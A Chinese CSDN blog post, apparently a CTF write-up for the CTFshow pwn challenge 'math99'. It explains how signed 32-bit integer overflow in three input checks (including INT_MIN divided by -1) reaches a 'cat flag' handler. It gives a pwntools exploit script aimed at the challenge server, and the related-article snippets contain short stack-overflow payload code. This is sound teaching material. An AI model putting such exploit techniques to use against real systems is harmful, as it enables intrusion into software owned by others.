CTFSHOW|pwn-数学99-wp

最新推荐文章于 2024-04-16 19:19:24 发布
最新推荐文章于 2024-04-16 19:19:24 发布
阅读量704 收藏 4
点赞数 1
分类专栏: CTF 文章标签: pwn
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/l2645470582_/article/details/121210298
版权

1.检查保护机制

2.我们用64位的IDA打开该文件

 查找关键字符串看到有“cat flag”

3.我们先预览一遍程序

main函数

 我们看到要if语句里面的三个函数条件为真

第一个函数

第二个函数

第三个函数

 

在第三个函数里面条件为真就可以拿到flag(handler)

4.第一个函数:sub_9C0()

 条件:

 因为输入变量s是有符号数的int型:0~2147483647 -2147483648~-1

所以8 -(-1)= 9

我们就可以输入a = 8        b = 4294967295 = -1

5.第二个函数:sub_AEE()

条件:

 因为输入的v2,v3是有符号数的int型:0~2147483647 -2147483648~-1

 所以我们可以让3 * 3 = 9

4294967305 = 9

 4294967305因式分解后为:48145*89209

 网址:tools.jb51.net/jisuanqi/factor_calc

6.第三个函数: sub_BA3()

条件:

 因为v2,v3是有符号数的int型:0~2147483647 -2147483648~-1

 所以: a = 2147483648        b = -1

或    : a =-2147483648        b = -1 

程序无法执行

7.EXP

#encoding = utf-8
from pwn import * 

context(os = 'linux',arch = 'amd64',log_level = 'debug')
content = 0

def main():
	if content == 1:
		p = process('pwn2')
	else:
		p = remote('pwn.challenge.ctf.show',28090)
	
	p.sendlineafter("a:",'8')
	p.sendlineafter("b:",'4294967295')
	
	p.sendlineafter("a:",'48145')
	p.sendlineafter("b:",'89209')
	
	p.sendlineafter("a:",'-2147483648')
	p.sendlineafter("b:",'-1')
	p.interactive()
main()

L__y
关注
  • 1
    点赞
  • 4
    收藏
    觉得还不错? 一键收藏
  • 1
    评论
专栏目录
CTFSHOW 36D杯CTF(pwn部分wp
weixin_44296844的博客
05-04 1879
PWN WP 感谢1p0ch师傅 最近参加了ctf.show举办的一个比赛,做了一下pwn题,以下是我的一些wp,由于本人能力有限,菜的一批,如果有什么不对的地方,请多包含。 PWN_签到 签到题直接nc上去以后发现考察的是linux的基本操作,程序过滤掉了空格,cat,但是我们可以ls查看 more<flag 这里<可以绕过空格 PWN_babyFmts...
CTFSHOW-PWN入门-前置基础(pwn5-pwn12)
2402_84133101的博客
04-13 399
mov eax,[esi]将esi中的值作为地址,然后将该地址单元的值赋给eax,即找到080490E8地址单元中的值赋给eax。mov ecx,msg将msg的地址赋值给ecx,此时ecx寄存器的值为0x80490E8。mov ecx,msg将msg的地址赋值给ecx,此时ecx寄存器的值为0x80490E8。mov ecx,msg将msg的地址赋值给ecx,此时ecx寄存器的值为0x80490E8。mov eax,[ecx]将ecx寄存器的值作为地址,将该地址单元中的值赋给eax。
ctfshow web入门99
m0_73303597的博客
01-11 604
自用
ctfshow 基础pwn wp
n1ptune__的博客
05-29 718
PWN01 简单栈溢出,ret2text from pwn import * #p = process("./pwn1") p = remote(ip,port) p.recv() payload = 'a'*(0x9+4) + p32(0x0804850F) p.sendline(payload) p.interactive() PWN03 32为程序,栈溢出,无system,ret2libc,32位程序通过栈传参 from pwn import * from LibcSearcher import *
ctfshow pwn1
qq_39980610的博客
08-19 347
pwn1
2023CTFSHOW愚人杯部分WP
qq_42585535的博客
04-04 707
call_user_func**来RCE。
Python库 | pwn-machine-1.1.tar.gz
03-11
Python库“pwn-machine-1.1.tar.gz”是一个用于网络安全和漏洞利用开发的工具集。这个库专门针对那些对安全研究和逆向工程感兴趣的开发者和爱好者。在Python中,库是可重用代码的集合,它使得程序员能够快速地构建...
CSAWCTF-2018-pwn-shellcode|CSAWCTF-2018-pwn-shellcode
12-10
CSAWCTF 2018年pwn题 shellcode 变形shellcode练手题目,该题目主要是利用三个节点来注入shellcode,考验解题人对shellcode的熟悉程度。题解:https://blog.csdn.net/A951860555/article/details/110350773
PWN-shellcode-WP- (一)题目文件.rar
03-29
为几道搜集的真题,https://blog.csdn.net/qq_43390703/article/details/105181147中有对他们的详细解答,是学习pwn入门的很好练手和熟悉知识点以及pwn技巧的真题。
2021-鹏城实验室-pwn-babyheap.zip
09-28
在本文中,我们将深入探讨2021年鹏城实验室的"Pwn-BabyHeap"挑战,这是一道涉及二进制安全和pwn技术的竞赛题目。本题主要考察了"off-by-null"漏洞的利用,这是一个在C语言编程中常见的安全问题。我们将围绕这个主题...
CTFshow-PWN入门-前置基础-全篇
weixin_63576152的博客
07-31 3577
本文主要详解CTFshow中pwn入门系列的前置基础模块,共30道题所用工具:linux环境下的虚拟机、IDA Pro、exeinfope的博客以下操作中小编用的都是自己的kali环境。
CTFshow php特性 web99
Kradress的博客
12-14 698
目录源码思路题解总结 源码 <?php /* # -*- coding: utf-8 -*- # @Author: h1xa # @Date: 2020-09-16 11:25:09 # @Last Modified by: h1xa # @Last Modified time: 2020-09-18 22:36:12 # @link: https://ctfer.com */ highlight_file(__FILE__); $allow = array(); //$allow
LitCTF PWN题解
ctfpwn的博客
06-02 590
接下来就是正常的64位ret2libc过程,找一个pop寄存器和ret地址,用这条指令:ROPgadget --binary pwn --only 'pop|ret'看看c伪代码,很容易看出是ret2libc题,并且对read读入的数据有一个strlen的判断,如果大于0x50就跳出。直接nc之后ls查看一下目录,看到一个dockerfile,cat一下就能发现打开flag文件的方式。然后通过给的libc文件计算偏移,得到system函数和/bin/sh字符串的地址。咳咳,接下来是正题。
CTFshow-pwn入门-前置基础pwn29-pwn31
T1ngSh0w的博客
06-21 1596
CTFshow-pwn入门-前置基础pwn29-pwn31(绕过PIE-pwn31)
ctfshow-pwn新手系列
ro4lsc的博客
06-14 9556
前言 十几天没发文了,都在写这篇文章,我也不知道为啥我要学pwn,当初是准备学汇编的,走上了不归之路,呜呜呜 pwn签到题 nc 连上就有flag pwn02 一个简单的ret2text 首先看main函数 那么接着跟到pwnme函数 可以看到buf只有9个字节 而fgets读入了50个字节,所以就导致了栈溢出 这是个32位的程序所以ret地址一般是ebp+4 看到stack函数 地址 故exp为 exp: from pwn import * #p = process("./pwn1") p
CTFshow-pwn入门-前置基础pwn13-pwn19
T1ngSh0w的博客
06-17 1951
ctfshow pwn入门-前置基础pwn13-pwn19
CTFshow PWN入门 Test_your_nc
2301_79612324的博客
12-24 421
需使用chmod +x给文件添加可执行权限system()函数里参数为"cat /ctfshow_flag",直接nc运行即可得到flag。
CTFshow-PWN-前置基础(pwn13-pwn16)
最新发布
Welcome To Myon'Blog !
04-16 1209
如何使用GCC?编译运行后即可获得flag下载附件,是一个 .c 文件定义了一个字符数组 flag[],其中包含一系列 ASCII 码值,最后以NULL字符(\0)结尾,表示字符串的结束,使用 printf() 函数,其中的 %s 是格式化字符串中的一个格式说明符,用于指示 printf() 函数要打印的内容是一个字符串,将字符数组以字符串的形式输出。编译好后我们直接使用 ./ 执行得到 flag:ctfshow{hOw_t0_us3_GCC?
CTFshow——Pwn(1)
Y_peak的博客
02-24 423
CTFshow——Pwn(1) 有点懒不想写write up了。只有exploit。 PWN签到题 from pwn import * p = remote('xxx',xxx) p.interactive() pwn02 from pwn import * p =remote("pwn.chall.ctf.show",28006) p.sendline('a'*(0x9+4) + p32(0x0804850F)) p.interactive() pwn03 from pwn import * from
ctfshow的pwn2
09-28
ctfshow的pwn2是一道2021年鹏城实验室的pwn题,该题目考查了libc-2.31.so下off-by-null的漏洞利用。根据提供的引用和引用,我们可以看到解题的步骤如下: 1. 首先,使用ls命令查看当前运行程序下的文件,找到flag...
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值